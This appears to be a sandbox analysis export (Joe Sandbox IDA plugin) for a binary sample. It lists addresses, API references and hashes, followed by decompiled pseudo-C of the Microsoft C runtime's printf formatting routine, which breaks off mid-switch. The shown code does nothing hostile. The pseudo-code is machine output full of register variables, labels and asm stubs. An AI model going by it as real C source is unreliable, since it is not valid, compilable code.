0x00000000
0x00000000
0x00423c69
0x00423c6c
0x00423c91
0x00423c96
0x00423c99
0x00423c9f
0x00423ca6
0x00423cb4
0x00423cc7
0x00423ccc
0x00423cdb
0x00000000
0x00423cdb
0x00423ca8
0x00423ca8
0x00000000
0x00423ca8
0x00423ce6
0x00423d03
0x00423d03
0x00423d0a
0x00423d0f
0x00423d12
0x00423d28
0x00423d2d
0x00423d2d
0x00423d12
0x00423d0a
0x00423d30
0x00423d30
0x00423d34
0x00423d3c
0x00423d41
0x00423d44
0x00423d44
0x00423d4b
0x00423d4b
0x00422ecb
0x00422ed2
0x00422edf
0x00422ee4
0x00000000
0x00422ef7
0x00422f01
0x00422f28
0x00422f0f
0x00422f20
0x00422f20
0x00422f01
0x00422f32
0x00422f38
0x00422f44
0x00422f47
0x00422f55
0x00422f58
0x00422f65
0x0042300a
0x00423010
0x00423016
0x0042301d
0x00000000
0x00000000
0x00423023
0x00423029
0x00000000
0x00423030
0x00423030
0x0042304a
0x0042304f
0x00000000
0x00000000
0x00423057
0x00423057
0x0042305e
0x00423061
0x00423064
0x00423067
0x0042306a
0x0042306d
0x00423070
0x00423077
0x0042307e
0x00000000
0x00000000
0x0042308a
0x0042308a
0x00423091
0x0042309d
0x004230a0
0x004230a6
0x004230ad
0x00000000
0x00000000
0x004230af
0x004230b5
0x004230b5
0x004230bc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00423100
0x00423100
0x00423107
0x0042310a
0x00423134
0x00423137
0x00423137
0x00423141
0x00423141
0x00423145
0x0042310c
0x0042310c
0x00423118
0x0042311b
0x0042311f
0x00423121
0x00423124
0x00423124
0x00423127
0x0042312a
0x0042312d
0x0042312f
0x0042312f
0x00423132
0x00423148
0x00000000
0x00000000
0x0042314d
0x0042314d
0x00000000
0x00000000
0x00423159
0x00423159
0x00423160
0x00423163
0x00423183
0x00423186
0x00423186
0x00423190
0x00423190
0x00423194
0x00423165
0x00423165
0x00423171
0x00423174
0x00423178
0x0042317a
0x0042317a
0x00423181
0x00000000
0x00000000
0x0042319c
0x0042319c
0x004231a3
0x004231af
0x004231b2
0x004231b8
0x004231bf
0x004232d2
0x00000000
0x004232d2
0x004231c5
0x004231cb
0x004231cb
0x004231d2
0x00000000
0x00423209
0x00423209
0x0042320c
0x0042320f
0x00423212
0x00423239
0x00423239
0x0042323c
0x0042323f
0x00423242
0x00423266
0x00423266
0x00423269
0x0042326c
0x0042326f
0x004232a8
0x004232b9
0x00000000
0x004232b9
0x00423271
0x00423271
0x00423274
0x00423277
0x0042327a
0x00000000
0x00000000
0x0042327c
0x0042327c
0x0042327f
0x00423282
0x00423285
0x00000000
0x00000000
0x00423287
0x00423287
0x0042328a
0x0042328d
0x00423290
0x00000000
0x00000000
0x00423292
0x00423292
0x00423295
0x00423298
0x0042329b
0x00000000
0x00000000
0x0042329d
0x0042329d
0x004232a0
0x004232a3
0x004232a6
0x004232aa
0x00000000
0x004232aa
0x00000000
0x004232a6
0x00423244
0x00423244
0x00423247
0x0042324b
0x0042324e
0x00000000
0x00423250
0x00423253
0x00423256
0x0042325c
0x00423261
0x00000000
0x00423261
0x0042324e
0x00423214
0x00423214
0x00423217
0x0042321b
0x0042321e
0x00000000
0x00423220
0x00423223
0x00423226
0x0042322c
0x00423231
0x00000000
0x00423231
0x00000000
0x004232bb
0x004232bb
0x004232be
0x004232c1
0x00000000
0x00000000
0x004231d9
0x004231d9
0x004231dc
0x004231df
0x004231e2
0x004231fb
0x004231fe
0x004231fe
0x00423201
0x004231e4
0x004231e4
0x004231e7
0x004231ea
0x004231f0
0x004231f6
0x004231f6
0x00000000
0x00000000
0x004232c6
0x004232c6
0x004232c9
0x004232c9
0x004232cf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004232d7
0x004232d7
0x004232de
0x004232e4
0x004232ea
0x004232ed
0x004232f3
0x004232fa
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423b50
0x00423300
0x00423306
0x00423306
0x0042330d
0x00000000
0x00423691
0x00423691
0x0042369f
0x0042369f
0x004236a2
0x00000000
0x00000000
0x00423314
0x00423317
0x00423317
0x0042331d
0x0042331f
0x00423322
0x00423322
0x00423325
0x00423325
0x00000000
0x00000000
0x0042345a
0x0042345d
0x0042345d
0x00423462
0x00423464
0x00423467
0x00423467
0x0042346a
0x0042346a
0x00000000
0x00000000
0x0042385d
0x0042385d
0x00000000
0x00000000
0x004233c4
0x004233c4
0x004233d0
0x004233d6
0x004233dd
0x004233eb
0x004233eb
0x004233f1
0x004233f4
0x00423400
0x00423455
0x00000000
0x00423455
0x004233df
0x004233df
0x004233e5
0x004233e9
0x00423408
0x00423408
0x0042340e
0x00423436
0x0042343d
0x00423443
0x00423446
0x00423449
0x0042344f
0x00423452
0x00423410
0x00423410
0x00423416
0x00423419
0x0042341c
0x00423422
0x00423425
0x00423428
0x0042342a
0x0042342d
0x0042342d
0x00000000
0x0042340e
0x00000000
0x00000000
0x004236a9
0x004236ac
0x004236af
0x004236b2
0x004236b8
0x004236bb
0x004236c2
0x004236c6
0x004236d1
0x004236d1
0x004236d5
0x004236ec
0x004236ec
0x004236f3
0x004236f5
0x004236f5
0x004236fc
0x004236fc
0x00423703
0x00423711
0x00423714
0x00423723
0x00423726
0x0042372a
0x0042373f
0x0042372c
0x0042372c
0x0042372f
0x00423735
0x0042373a
0x0042373a
0x0042372a
0x00423749
0x0042374c
0x0042374f
0x00423752
0x00423755
0x00423758
0x0042375e
0x00423764
0x0042376c
0x0042376d
0x00423770
0x00423771
0x00423774
0x00423775
0x0042377c
0x0042377d
0x00423780
0x00423781
0x00423784
0x00423785
0x0042378b
0x0042378c
0x0042379b
0x0042379d
0x004237a3
0x004237a3
0x004237a8
0x004237aa
0x004237ae
0x004237b0
0x004237b8
0x004237b9
0x004237bc
0x004237bd
0x004237cc
0x004237ce
0x004237ce
0x004237ae
0x004237d1
0x004237d8
0x004237db
0x004237e0
0x004237e0
0x004237e6
0x004237e8
0x004237f0
0x004237f1
0x004237f4
0x004237f5
0x00423803
0x00423805
0x00423805
0x004237e6
0x00423808
0x0042380b
0x0042380e
0x00423811
0x00423816
0x0042381b
0x0042381e
0x00423821
0x00423821
0x00423824
0x00423824
0x00423827
0x00423833
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00000000
0x00423b50
0x004236d7
0x004236d7
0x004236de
0x004236e1
0x00000000
0x00000000
0x004236e3
0x004236e3
0x00000000
0x004236e3
0x004236c8
0x004236c8
0x00000000
0x00000000
0x00423328
0x00423328
0x00423333
0x0042333b
0x00423342
0x00423345
0x00423345
0x00423348
0x004233a8
0x0042334a
0x00423351
0x00423357
0x0042335d
0x00423364
0x00423367
0x0042336d
0x00423375
0x00423377
0x0042337e
0x00423385
0x0042338c
0x00423394
0x00423396
0x00423398
0x00423398
0x0042339f
0x004233af
0x004233b5
0x004233b8
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00000000
0x0042383b
0x0042383e
0x00423841
0x00423844
0x004238c2
0x004238c5
0x004238ca
0x004238ec
0x004238ec
0x004238f2
0x00423914
0x00423917
0x0042395e
0x0042395e
0x00423961
0x00423982
0x00423987
0x0042398a
0x0042398c
0x00423992
0x00423963
0x00423967
0x0042396c
0x0042396f
0x00423970
0x00423976
0x00423976
0x00423919
0x0042391c
0x0042391c
0x0042391f
0x00423941
0x00423946
0x0042394c
0x0042394d
0x00423953
0x00423921
0x00423925
0x0042392a
0x0042392e
0x0042392f
0x00423935
0x00423935
0x00423959
0x004238f4
0x004238f8
0x004238fd
0x00423900
0x00423906
0x00423906
0x004238cc
0x004238d0
0x004238d5
0x004238d8
0x004238de
0x004238de
0x0042399b
0x0042399e
0x00000000
0x00000000
0x00000000
0x0042359a
0x0042359a
0x004235a6
0x004235ac
0x004235b1
0x004235b3
0x0042365d
0x0042365d
0x00423660
0x00423660
0x00423663
0x00423677
0x0042367d
0x00423683
0x00423665
0x00423665
0x0042366b
0x00423672
0x00423672
0x00423685
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423b50
0x004235b9
0x004235b9
0x004235b9
0x004235bb
0x004235c9
0x004235bd
0x004235bd
0x004235bd
0x004235d3
0x004235d9
0x004235df
0x004235e6
0x004235e8
0x004235ed
0x004235ef
0x004235f4
0x004235f9
0x004235fb
0x00423600
0x00423603
0x00423606
0x00423608
0x00423608
0x00423606
0x00423609
0x00423610
0x00423658
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423612
0x00423612
0x00423617
0x00423633
0x0042363b
0x00423645
0x00423648
0x0042364d
0x00000000
0x0042364d
0x00000000
0x00000000
0x00000000
0x00423856
0x00423856
0x00000000
0x00000000
0x0042346d
0x0042346d
0x00423471
0x0042347f
0x00423482
0x00423473
0x00423473
0x00423473
0x00423488
0x0042348e
0x00423494
0x004234a0
0x004234a6
0x004234a6
0x004234a9
0x00423531
0x00423531
0x00423535
0x00423537
0x0042353d
0x0042353d
0x00423540
0x00423547
0x0042354a
0x00423550
0x00423550
0x00423550
0x00423556
0x0042355c
0x0042355f
0x00423565
0x00423567
0x00000000
0x00000000
0x00423569
0x00423569
0x0042356f
0x00423572
0x00423574
0x00000000
0x00000000
0x00423576
0x0042357c
0x0042357f
0x0042357f
0x00423587
0x00423587
0x0042358d
0x0042358d
0x00423592
0x00000000
0x004234af
0x004234af
0x004234af
0x004234b3
0x004234b5
0x004234ba
0x004234ba
0x004234bd
0x004234c0
0x004234c6
0x004234d8
0x004234d8
0x004234d8
0x004234db
0x004234e1
0x00000000
0x00000000
0x004234e3
0x004234e3
0x004234e9
0x004234ec
0x004234ee
0x00000000
0x00000000
0x004234f0
0x004234f0
0x004234f9
0x004234ff
0x00423503
0x0042350b
0x0042350d
0x0042350f
0x00423515
0x00423515
0x00423518
0x00423518
0x00423524
0x00423527
0x004234cf
0x004234d2
0x004234d2
0x004234d5
0x004234d5
0x0042352f
0x00423595
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423b50
0x00000000
0x0042384d
0x0042384d
0x004238c2
0x004238c2
0x004238c5
0x004238ca
0x004238ec
0x004238ec
0x004238f2
0x00423914
0x00423917
0x0042395e
0x0042395e
0x00423961
0x00423982
0x00423987
0x0042398a
0x0042398c
0x00423992
0x00423963
0x00423967
0x0042396c
0x0042396f
0x00423970
0x00423976
0x00423976
0x00423919
0x0042391c
0x0042391c
0x0042391f
0x00423941
0x00423946
0x0042394c
0x0042394d
0x00423953
0x00423921
0x00423925
0x0042392a
0x0042392e
0x0042392f
0x00423935
0x00423935
0x00423959
0x004238f4
0x004238f8
0x004238fd
0x00423900
0x00423906
0x00423906
0x004238cc
0x004238d0
0x004238d5
0x004238d8
0x004238de
0x004238de
0x0042399b
0x0042399e
0x00000000
0x00000000
0x00000000
0x0042399e
0x00000000
0x00423869
0x00423869
0x00423873
0x00423873
0x0042387d
0x0042387d
0x00423883
0x00423885
0x0042388a
0x00423894
0x00423894
0x00423897
0x0042389b
0x0042389b
0x004238c2
0x004238c2
0x004238c5
0x004238ca
0x004238ec
0x004238ec
0x004238f2
0x00423914
0x00423917
0x0042395e
0x0042395e
0x00423961
0x00423982
0x00423987
0x0042398a
0x0042398c
0x00423992
0x00423963
0x00423967
0x0042396c
0x0042396f
0x00423970
0x00423976
0x00423976
0x00423919
0x0042391c
0x0042391c
0x0042391f
0x00423941
0x00423946
0x0042394c
0x0042394d
0x00423953
0x00423921
0x00423925
0x0042392a
0x0042392e
0x0042392f
0x00423935
0x00423935
0x00423959
0x004238f4
0x004238f8
0x004238fd
0x00423900
0x00423906
0x00423906
0x004238cc
0x004238d0
0x004238d5
0x004238d8
0x004238de
0x004238de
0x0042399b
0x0042399e
0x00000000
0x00000000
0x00000000
0x0042399e
0x00000000
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00000000
0x00000000
0x004230d9
0x004230d9
0x004230dc
0x004230df
0x00000000
0x00000000
0x004230e4
0x004230e7
0x004230ed
0x00000000
0x00000000
0x004230ce
0x004230d1
0x004230d4
0x00000000
0x00000000
0x004230c3
0x004230c6
0x004230c9
0x00000000
0x00000000
0x004230f2
0x004230f2
0x004230f5
0x004230f5
0x004230f8
0x00000000
0x00000000
0x004230fb
0x00000000
0x00000000
0x00422f6b
0x00422f6b
0x00422f6d
0x00422f7b
0x00422f6f
0x00422f6f
0x00422f6f
0x00422f8b
0x00422f98
0x00422f9a
0x00422f9f
0x00422fa1
0x00422fa6
0x00422fab
0x00422fad
0x00422fb2
0x00422fb8
0x00422fba
0x00422fba
0x00422fb8
0x00422fbb
0x00422fc2
0x00000000
0x00422fc4
0x00422fc9
0x00422fe5
0x00422fed
0x00422ffa
0x00422fff
0x00423e14
0x00423e21
0x00423e21
0x00422fc2
0x00422f65
0x00423d50
0x00423d50
0x00423d57
0x00423d6e
0x00423d6e
0x00423d78
0x00423d78
0x00423d7e
0x00423d84
0x00423d8b
0x00423d8d
0x00423d92
0x00423d94
0x00423d99
0x00423d9e
0x00423da0
0x00423da5
0x00423da8
0x00423dab
0x00423dad
0x00423dad
0x00423dab
0x00423dae
0x00423db5
0x00423e00
0x00423e09
0x00423e0e
0x00423db7
0x00423dbc
0x00423dd8
0x00423de0
0x00423ded
0x00423df2
0x00423df2
0x00000000
0x00423db5
0x00423d59
0x00423d59
0x00423d60
0x00000000
0x00000000
0x00423d62
0x00423d62
0x00000000
0x00423d62
0x00423b50
0x00423b27
0x00423b27
0x00423b2b
0x00423b38
0x00423b3e
0x00423b44
0x00423b4a
0x00423b4a
0x00423b4d
0x00000000
0x00423b4d
0x00423b2d
0x00423b33
0x00423b36
0x00000000
0x00000000
0x00000000
0x00423b36
0x00423a8c
0x00423a8f
0x00423a99
0x00423aa8
0x00423ab1
0x00423ac7
0x00423acd
0x00423ad3
0x00423ada
0x00423ae2
0x00423ae2
0x00423ae8
0x00423ae8
0x00423af7
0x00423aff
0x00423a6e
0x00423a74
0x00423a77
0x00423a7a
0x00423a7c
0x00000000
0x00000000
0x00000000
0x00423a7c
0x00423a6e
0x004239ab
0x004239ab
0x004239b2
0x00000000
0x00000000
0x00000000
0x004239e0
0x004239e6
0x004239f2
0x00000000
0x004239f2
0x004238c2

APIs

_get_int64_arg.LIBCMTD ref: 004238D0
__aullrem.LIBCMT ref: 00423AA0
__aulldiv.LIBCMT ref: 00423AC2

Strings

9, xrefs: 00423AD3

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: e6c841aebb8e88079bce77d3c667df01c1dfa02aa3176e737be682908ef7a473
Instruction ID: fe0f5afc66fe53625dceebb5728f2a418b245d516593ae05ee0a08e45698a4e2
Opcode Fuzzy Hash: e6c841aebb8e88079bce77d3c667df01c1dfa02aa3176e737be682908ef7a473
Instruction Fuzzy Hash: FC4127B1E001299FDF24CF48D881BAEB7B5FF86315F4041AAE188AB241C7785E81CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0042252C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0042252C() {
				signed int _t496;
				signed int _t518;
				void* _t523;
				signed int _t525;
				void* _t545;
				signed int _t563;
				signed int _t576;
				signed int _t580;
				signed short _t581;
				signed int _t584;
				signed int _t587;
				signed int _t588;
				intOrPtr _t589;
				signed int _t611;
				signed int _t639;
				signed int _t647;
				signed int _t649;
				signed int _t651;
				signed int _t658;
				signed int _t662;
				signed int _t698;
				intOrPtr _t699;
				intOrPtr _t700;
				signed int _t701;
				void* _t703;

				L0:
				while(1) {
					L0:
					 *(_t701 - 8) = 8;
					if(( *(_t701 - 0x10) & 0x00000080) != 0) {
						__edx =  *(__ebp - 0x10);
						__edx =  *(__ebp - 0x10) | 0x00000200;
						__eflags = __edx;
						 *(__ebp - 0x10) = __edx;
					}
					while(1) {
						L153:
						__eflags =  *(_t701 - 0x10) & 0x00008000;
						if(( *(_t701 - 0x10) & 0x00008000) == 0) {
							_t649 =  *(_t701 - 0x10) & 0x00001000;
							__eflags = _t649;
							if(_t649 == 0) {
								__eflags =  *(_t701 - 0x10) & 0x00000020;
								if(( *(_t701 - 0x10) & 0x00000020) == 0) {
									_t651 =  *(_t701 - 0x10) & 0x00000040;
									__eflags = _t651;
									if(_t651 == 0) {
										_t496 = E0041F270(_t701 + 0x14);
										_t703 = _t703 + 4;
										__eflags = 0;
										 *(_t701 - 0x2b8) = _t496;
										 *(_t701 - 0x2b4) = 0;
									} else {
										_t580 = E0041F270(_t701 + 0x14);
										_t703 = _t703 + 4;
										asm("cdq");
										 *(_t701 - 0x2b8) = _t580;
										 *(_t701 - 0x2b4) = _t651;
									}
								} else {
									_t698 =  *(_t701 - 0x10) & 0x00000040;
									__eflags = _t698;
									if(_t698 == 0) {
										_t581 = E0041F270(_t701 + 0x14);
										_t703 = _t703 + 4;
										asm("cdq");
										 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
										 *(_t701 - 0x2b4) = _t698;
									} else {
										_t584 = E0041F270(_t701 + 0x14);
										_t703 = _t703 + 4;
										asm("cdq");
										 *(_t701 - 0x2b8) = _t584;
										 *(_t701 - 0x2b4) = _t698;
									}
								}
							} else {
								_t587 = E0041F290(_t701 + 0x14);
								_t703 = _t703 + 4;
								 *(_t701 - 0x2b8) = _t587;
								 *(_t701 - 0x2b4) = _t649;
							}
						} else {
							_t588 = E0041F290(_t701 + 0x14);
							_t703 = _t703 + 4;
							 *(_t701 - 0x2b8) = _t588;
							 *(_t701 - 0x2b4) = _t647;
						}
						__eflags =  *(_t701 - 0x10) & 0x00000040;
						if(( *(_t701 - 0x10) & 0x00000040) == 0) {
							goto L170;
						}
						L166:
						__eflags =  *(_t701 - 0x2b4);
						if(__eflags > 0) {
							goto L170;
						}
						L167:
						if(__eflags < 0) {
							L169:
							asm("adc edx, 0x0");
							 *(_t701 - 0x2c0) =  ~( *(_t701 - 0x2b8));
							 *(_t701 - 0x2bc) =  ~( *(_t701 - 0x2b4));
							 *(_t701 - 0x10) =  *(_t701 - 0x10) | 0x00000100;
							L171:
							__eflags =  *(_t701 - 0x10) & 0x00008000;
							if(( *(_t701 - 0x10) & 0x00008000) == 0) {
								__eflags =  *(_t701 - 0x10) & 0x00001000;
								if(( *(_t701 - 0x10) & 0x00001000) == 0) {
									_t576 =  *(_t701 - 0x2bc) & 0x00000000;
									__eflags = _t576;
									 *(_t701 - 0x2bc) = _t576;
								}
							}
							__eflags =  *(_t701 - 0x30);
							if( *(_t701 - 0x30) >= 0) {
								 *(_t701 - 0x10) =  *(_t701 - 0x10) & 0xfffffff7;
								__eflags =  *(_t701 - 0x30) - 0x200;
								if( *(_t701 - 0x30) > 0x200) {
									 *(_t701 - 0x30) = 0x200;
								}
							} else {
								 *(_t701 - 0x30) = 1;
							}
							__eflags =  *(_t701 - 0x2c0) |  *(_t701 - 0x2bc);
							if(( *(_t701 - 0x2c0) |  *(_t701 - 0x2bc)) == 0) {
								 *(_t701 - 0x1c) = 0;
							}
							 *((intOrPtr*)(_t701 - 4)) = _t701 - 0x49;
							while(1) {
								L181:
								_t657 =  *(_t701 - 0x30) - 1;
								 *(_t701 - 0x30) =  *(_t701 - 0x30) - 1;
								__eflags =  *(_t701 - 0x30);
								if( *(_t701 - 0x30) > 0) {
									goto L183;
								}
								L182:
								__eflags =  *(_t701 - 0x2c0) |  *(_t701 - 0x2bc);
								if(( *(_t701 - 0x2c0) |  *(_t701 - 0x2bc)) == 0) {
									L186:
									 *(_t701 - 0x24) = _t701 - 0x49 -  *((intOrPtr*)(_t701 - 4));
									 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) + 1;
									__eflags =  *(_t701 - 0x10) & 0x00000200;
									if(( *(_t701 - 0x10) & 0x00000200) == 0) {
										while(1) {
											L190:
											__eflags =  *(_t701 - 0x28);
											if( *(_t701 - 0x28) != 0) {
												goto L216;
											}
											L191:
											__eflags =  *(_t701 - 0x10) & 0x00000040;
											if(( *(_t701 - 0x10) & 0x00000040) != 0) {
												__eflags =  *(_t701 - 0x10) & 0x00000100;
												if(( *(_t701 - 0x10) & 0x00000100) == 0) {
													__eflags =  *(_t701 - 0x10) & 0x00000001;
													if(( *(_t701 - 0x10) & 0x00000001) == 0) {
														__eflags =  *(_t701 - 0x10) & 0x00000002;
														if(( *(_t701 - 0x10) & 0x00000002) != 0) {
															 *((char*)(_t701 - 0x14)) = 0x20;
															 *(_t701 - 0x1c) = 1;
														}
													} else {
														 *((char*)(_t701 - 0x14)) = 0x2b;
														 *(_t701 - 0x1c) = 1;
													}
												} else {
													 *((char*)(_t701 - 0x14)) = 0x2d;
													 *(_t701 - 0x1c) = 1;
												}
											}
											 *((intOrPtr*)(_t701 - 0x2c4)) =  *((intOrPtr*)(_t701 - 0x18)) -  *(_t701 - 0x24) -  *(_t701 - 0x1c);
											__eflags =  *(_t701 - 0x10) & 0x0000000c;
											if(( *(_t701 - 0x10) & 0x0000000c) == 0) {
												E00422C60(0x20,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
												_t703 = _t703 + 0x10;
											}
											E00422CA0( *(_t701 - 0x1c), _t701 - 0x14,  *(_t701 - 0x1c),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
											_t703 = _t703 + 0x10;
											__eflags =  *(_t701 - 0x10) & 0x00000008;
											if(( *(_t701 - 0x10) & 0x00000008) != 0) {
												__eflags =  *(_t701 - 0x10) & 0x00000004;
												if(( *(_t701 - 0x10) & 0x00000004) == 0) {
													E00422C60(0x30,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
													_t703 = _t703 + 0x10;
												}
											}
											__eflags =  *(_t701 - 0xc);
											if( *(_t701 - 0xc) == 0) {
												L212:
												E00422CA0( *((intOrPtr*)(_t701 - 4)),  *((intOrPtr*)(_t701 - 4)),  *(_t701 - 0x24),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
												_t703 = _t703 + 0x10;
												goto L213;
											} else {
												L204:
												__eflags =  *(_t701 - 0x24);
												if( *(_t701 - 0x24) <= 0) {
													goto L212;
												}
												L205:
												 *(_t701 - 0x2dc) = 0;
												 *((intOrPtr*)(_t701 - 0x2c8)) =  *((intOrPtr*)(_t701 - 4));
												 *(_t701 - 0x2cc) =  *(_t701 - 0x24);
												while(1) {
													L206:
													 *(_t701 - 0x2cc) =  *(_t701 - 0x2cc) - 1;
													__eflags =  *(_t701 - 0x2cc);
													if( *(_t701 - 0x2cc) == 0) {
														break;
													}
													L207:
													 *(_t701 - 0x32e) =  *((intOrPtr*)( *((intOrPtr*)(_t701 - 0x2c8))));
													_t563 = E00424E90(_t701 - 0x2d0, _t701 - 0x2d8, 6,  *(_t701 - 0x32e) & 0x0000ffff);
													_t703 = _t703 + 0x10;
													 *(_t701 - 0x2dc) = _t563;
													 *((intOrPtr*)(_t701 - 0x2c8)) =  *((intOrPtr*)(_t701 - 0x2c8)) + 2;
													__eflags =  *(_t701 - 0x2dc);
													if( *(_t701 - 0x2dc) != 0) {
														L209:
														 *(_t701 - 0x24c) = 0xffffffff;
														break;
													}
													L208:
													__eflags =  *(_t701 - 0x2d0);
													if( *(_t701 - 0x2d0) != 0) {
														L210:
														E00422CA0( *((intOrPtr*)(_t701 + 8)), _t701 - 0x2d8,  *(_t701 - 0x2d0),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
														_t703 = _t703 + 0x10;
														continue;
													}
													goto L209;
												}
												L211:
												L213:
												__eflags =  *(_t701 - 0x24c);
												if( *(_t701 - 0x24c) >= 0) {
													__eflags =  *(_t701 - 0x10) & 0x00000004;
													if(( *(_t701 - 0x10) & 0x00000004) != 0) {
														E00422C60(0x20,  *((intOrPtr*)(_t701 - 0x2c4)),  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
														_t703 = _t703 + 0x10;
													}
												}
											}
											L216:
											__eflags =  *(_t701 - 0x20);
											if( *(_t701 - 0x20) != 0) {
												L0040F230( *(_t701 - 0x20), 2);
												_t703 = _t703 + 8;
												 *(_t701 - 0x20) = 0;
											}
											while(1) {
												L218:
												 *(_t701 - 0x251) =  *( *(_t701 + 0xc));
												_t665 =  *(_t701 - 0x251);
												 *(_t701 + 0xc) =  *(_t701 + 0xc) + 1;
												if( *(_t701 - 0x251) == 0 ||  *(_t701 - 0x24c) < 0) {
													break;
												} else {
													if( *(_t701 - 0x251) < 0x20 ||  *(_t701 - 0x251) > 0x78) {
														 *(_t701 - 0x310) = 0;
													} else {
														 *(_t701 - 0x310) =  *( *(_t701 - 0x251) + L"h != _T(\'\\0\'))") & 0xf;
													}
												}
												L7:
												 *(_t701 - 0x250) =  *(_t701 - 0x310);
												_t525 =  *(_t701 - 0x250) * 9;
												_t611 =  *(_t701 - 0x25c);
												_t665 = ( *(_t525 + _t611 + 0x4081a0) & 0x000000ff) >> 4;
												 *(_t701 - 0x25c) = ( *(_t525 + _t611 + 0x4081a0) & 0x000000ff) >> 4;
												if( *(_t701 - 0x25c) != 8) {
													L16:
													 *(_t701 - 0x318) =  *(_t701 - 0x25c);
													__eflags =  *(_t701 - 0x318) - 7;
													if( *(_t701 - 0x318) > 7) {
														continue;
													}
													L17:
													switch( *((intOrPtr*)( *(_t701 - 0x318) * 4 +  &M00422AB0))) {
														case 0:
															L18:
															 *(_t701 - 0xc) = 0;
															_t528 = E00420DA0( *(_t701 - 0x251) & 0x000000ff, E004103A0(_t701 - 0x40));
															_t706 = _t703 + 8;
															__eflags = _t528;
															if(_t528 == 0) {
																L24:
																E00422BC0( *(_t701 - 0x251) & 0x000000ff,  *(_t701 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
																_t703 = _t706 + 0xc;
																goto L218;
															} else {
																E00422BC0( *((intOrPtr*)(_t701 + 8)),  *(_t701 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t701 + 8)), _t701 - 0x24c);
																_t706 = _t706 + 0xc;
																_t616 =  *( *(_t701 + 0xc));
																 *(_t701 - 0x251) =  *( *(_t701 + 0xc));
																_t665 =  *(_t701 + 0xc) + 1;
																__eflags = _t665;
																 *(_t701 + 0xc) = _t665;
																asm("sbb eax, eax");
																 *(_t701 - 0x27c) =  ~( ~( *(_t701 - 0x251)));
																if(_t665 == 0) {
																	_push(L"(ch != _T(\'\\0\'))");
																	_push(0);
																	_push(0x486);
																	_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																	_push(2);
																	_t540 = L0040C820();
																	_t706 = _t706 + 0x14;
																	__eflags = _t540 - 1;
																	if(_t540 == 1) {
																		asm("int3");
																	}
																}
																L22:
																__eflags =  *(_t701 - 0x27c);
																if( *(_t701 - 0x27c) != 0) {
																	goto L24;
																} else {
																	 *((intOrPtr*)(L00411810(_t616))) = 0x16;
																	E0040C660(_t589, _t616, _t699, _t700, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
																	 *(_t701 - 0x2f4) = 0xffffffff;
																	E00410370(_t701 - 0x40);
																	_t518 =  *(_t701 - 0x2f4);
																	goto L229;
																}
															}
														case 1:
															L25:
															 *(__ebp - 0x2c) = 0;
															__edx =  *(__ebp - 0x2c);
															 *(__ebp - 0x28) =  *(__ebp - 0x2c);
															__eax =  *(__ebp - 0x28);
															 *(__ebp - 0x18) =  *(__ebp - 0x28);
															__ecx =  *(__ebp - 0x18);
															 *(__ebp - 0x1c) = __ecx;
															 *(__ebp - 0x10) = 0;
															 *(__ebp - 0x30) = 0xffffffff;
															 *(__ebp - 0xc) = 0;
															goto L218;
														case 2:
															L26:
															__edx =  *((char*)(__ebp - 0x251));
															 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
															 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
															 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
															__eflags =  *(__ebp - 0x31c) - 0x10;
															if( *(__ebp - 0x31c) > 0x10) {
																goto L33;
															}
															L27:
															__ecx =  *(__ebp - 0x31c);
															_t73 = __ecx + 0x422ae8; // 0x498d04
															__edx =  *_t73 & 0x000000ff;
															switch( *((intOrPtr*)(( *_t73 & 0x000000ff) * 4 +  &M00422AD0))) {
																case 0:
																	goto L30;
																case 1:
																	goto L31;
																case 2:
																	goto L29;
																case 3:
																	goto L28;
																case 4:
